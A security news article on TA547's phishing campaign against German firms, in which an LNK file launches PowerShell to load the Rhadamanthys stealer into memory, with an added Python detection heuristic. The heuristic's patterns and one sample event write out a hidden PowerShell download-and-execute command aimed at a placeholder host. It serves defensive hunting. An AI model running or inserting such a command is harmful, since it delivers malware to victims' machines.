Cybersecurity firm Proofpoint has discovered a phishing campaign targeting German organizations. The culprit, a financially motivated threat actor known as TA547, has been leveraging emails to distribute Rhadamanthys, a malware program designed to pilfer sensitive data.
This campaign marks TA547's first foray into deploying Rhadamanthys, a malware strain popular among various cybercriminal groups. Proofpoint researchers also believe TA547 may have utilized a large language model (LLM) to generate a PowerShell script used within the attack.
TA547, active since at least late 2017, has a history of employing phishing tactics to deliver a diverse arsenal of malware targeting both Windows and Android systems. In the past, TA547 has been linked to the distribution of ZLoader, Gootkit, DanaBot, Ursnif, and even the ransomware variant Adhubllka.
The current campaign specifically targets German organizations across various industries. Phishing emails impersonate legitimate German companies, such as retail giant Metro. These emails typically contain a password-protected ZIP archive. Once opened, the archive prompts the user for the password, which in this case is "MAR26". Within the archive lies an LNK file. Executing this file triggers a PowerShell script that retrieves a malicious Rhadamanthys executable stored remotely. The PowerShell script then loads this executable directly into memory rather than writing it to disk first.
Because the payload never touches disk, file-based scanning by security software has nothing to inspect, which can let the malware run undetected for longer.
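To give the detection side of this chain something concrete, the following is an added example (not code from Proofpoint or from the report) of a heuristic hunt over constructed process-creation telemetry: it flags a PowerShell process launched from Explorer, as happens on an LNK double-click, whose command line both fetches remote content and executes it in memory. The patterns, threshold and sample events are assumptions for illustration, not indicators from the campaign.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Heuristic patterns (assumed here, not signatures taken from the Proofpoint report).
SHELL_RE = re.compile(r"^(powershell|pwsh)(\.exe)?$", re.I)
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\b", re.I)
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|net\.webclient|downloadstring|downloaddata|"
    r"start-bitstransfer|\bcurl\b|\bwget\b", re.I)
IN_MEMORY_RE = re.compile(
    r"invoke-expression|\biex\b|reflection\.assembly\]::load|frombase64string", re.I)

@dataclass
class ProcEvent:            # one process-creation record (Sysmon event 1 or EDR equivalent)
    event_id: int
    parent_image: str
    image: str
    command_line: str

def classify(ev: ProcEvent) -> List[str]:
    """Return the heuristics this event matches; empty unless it is a PowerShell launch."""
    hits: List[str] = []
    basename = ev.image.replace("\\", "/").rsplit("/", 1)[-1]
    if not SHELL_RE.match(basename):
        return hits
    if ev.parent_image.lower().endswith("explorer.exe"):
        hits.append("explorer_parent")      # spawned by a double-click, e.g. on an LNK
    if HIDDEN_RE.search(ev.command_line):
        hits.append("hidden_or_encoded")    # hidden window or encoded command line
    if DOWNLOAD_RE.search(ev.command_line):
        hits.append("remote_fetch")         # pulls content from a remote host
    if IN_MEMORY_RE.search(ev.command_line):
        hits.append("in_memory_exec")       # runs fetched content without writing a file
    return hits

def find_suspicious(events: List[ProcEvent], min_hits: int = 3) -> List[Tuple[int, List[str]]]:
    # Events matching at least min_hits heuristics, in input order.
    return [(ev.event_id, h) for ev in events if len(h := classify(ev)) >= min_hits]

# Constructed sample telemetry; hosts are placeholders, not indicators from the report.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(1, r"C:\Windows\explorer.exe", PS, r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"),
    ProcEvent(2, r"C:\Windows\explorer.exe", PS, "powershell.exe -w hidden -nop -c "
              "\"IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/p')\""),
    ProcEvent(3, r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    ProcEvent(4, r"C:\Windows\System32\cmd.exe", r"C:\Program Files\PowerShell\7\pwsh.exe",
              "pwsh -c Invoke-WebRequest https://placeholder.invalid/report.csv -OutFile report.csv"),
]
```

Only event 2 clears the default threshold; the admin's scripted backup (event 1) and the interactive download to a file (event 4) each trip a single heuristic and are left alone.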
Proofpoint's findings indicate a shift in TA547's preferred delivery method. Throughout 2023, the threat actor primarily relied on compressed JavaScript attachments to deliver malware payloads. However, in early March 2024, TA547 appears to have transitioned to compressed LNK files.
While the current campaign focuses on German organizations, Proofpoint has observed TA547 targeting entities in other regions recently, including Spain, Switzerland, Austria, and the United States.
Organizations are advised to remain vigilant against phishing attempts. Employees should be wary of unsolicited emails, particularly those containing attachments or urging them to click on links. Verifying the sender's identity and scrutinizing email content for inconsistencies are crucial steps in mitigating the risk of falling victim to a phishing attack.
Implementing robust security measures, including email filtering and endpoint detection and response (EDR) solutions, is also paramount in safeguarding against such threats.